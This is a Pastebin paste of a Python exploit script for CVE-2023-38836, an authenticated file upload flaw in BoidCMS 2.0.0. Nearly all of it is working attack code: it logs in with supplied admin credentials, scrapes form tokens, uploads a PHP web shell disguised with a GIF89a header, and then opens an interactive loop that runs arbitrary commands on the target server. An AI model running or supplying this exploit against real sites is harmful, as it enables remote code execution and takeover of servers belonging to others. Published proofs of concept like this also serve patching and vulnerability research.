Advertisement
FlyFar

BoidCMS v2.0.0 - Authenticated File Upload Vulnerability - CVE-2023-38836

Jan 17th, 2024
1,071
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.86 KB | Cybersecurity | 0 0
  1. #!/usr/bin/python3
  2. # Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability
  3. # Date: 08/21/2023
  4. # Exploit Author: 1337kid
  5. # Vendor Homepage: https://boidcms.github.io/#/
  6. # Software Link: https://boidcms.github.io/BoidCMS.zip
  7. # Version: <= 2.0.0
  8. # Tested on: Ubuntu
  9. # CVE : CVE-2023-38836
  10.  
  11. import requests
  12. import re
  13. import argparse
  14.  
  15. parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')
  16. parser.add_argument("-u", "--url", help="website url")
  17. parser.add_argument("-l", "--user", help="admin username")
  18. parser.add_argument("-p", "--passwd", help="admin password")
  19. args = parser.parse_args()
  20. base_url=args.url
  21. user=args.user
  22. passwd=args.passwd
  23.  
  24. def showhelp():
  25.     print(parser.print_help())
  26.     exit()
  27. if base_url == None: showhelp()
  28. elif user == None: showhelp()
  29. elif passwd == None: showhelp()
  30.  
  31. with requests.Session() as s:
  32.     req=s.get(f'{base_url}/admin')
  33.     token=re.findall('[a-z0-9]{64}',req.text)
  34.     form_login_data={
  35.         "username":user,
  36.         "password":passwd,
  37.         "login":"Login",
  38.     }
  39.     form_login_data['token']=token
  40.     s.post(f'{base_url}/admin',data=form_login_data)
  41.     #=========== File upload to RCE
  42.     req=s.get(f'{base_url}/admin?page=media')
  43.     token=re.findall('[a-z0-9]{64}',req.text)
  44.     form_upld_data={
  45.         "token":token,
  46.         "upload":"Upload"
  47.     }
  48.     #==== php shell
  49.     php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']
  50.     with open('shell.php','w') as f:
  51.         f.writelines(php_code)
  52.     #====
  53.     file = {'file' : open('shell.php','rb')}
  54.     s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)
  55.     req=s.get(f'{base_url}/media/shell.php')
  56.     if req.status_code == '404':
  57.         print("Upload failed")
  58.         exit()
  59.     print(f'Shell uploaded to "{base_url}/media/shell.php"')
  60.     while 1:
  61.         cmd=input("cmd >> ")
  62.         if cmd=='exit': exit()
  63.         req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})
  64.         print(req.text)
  65.            
Tags: Exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement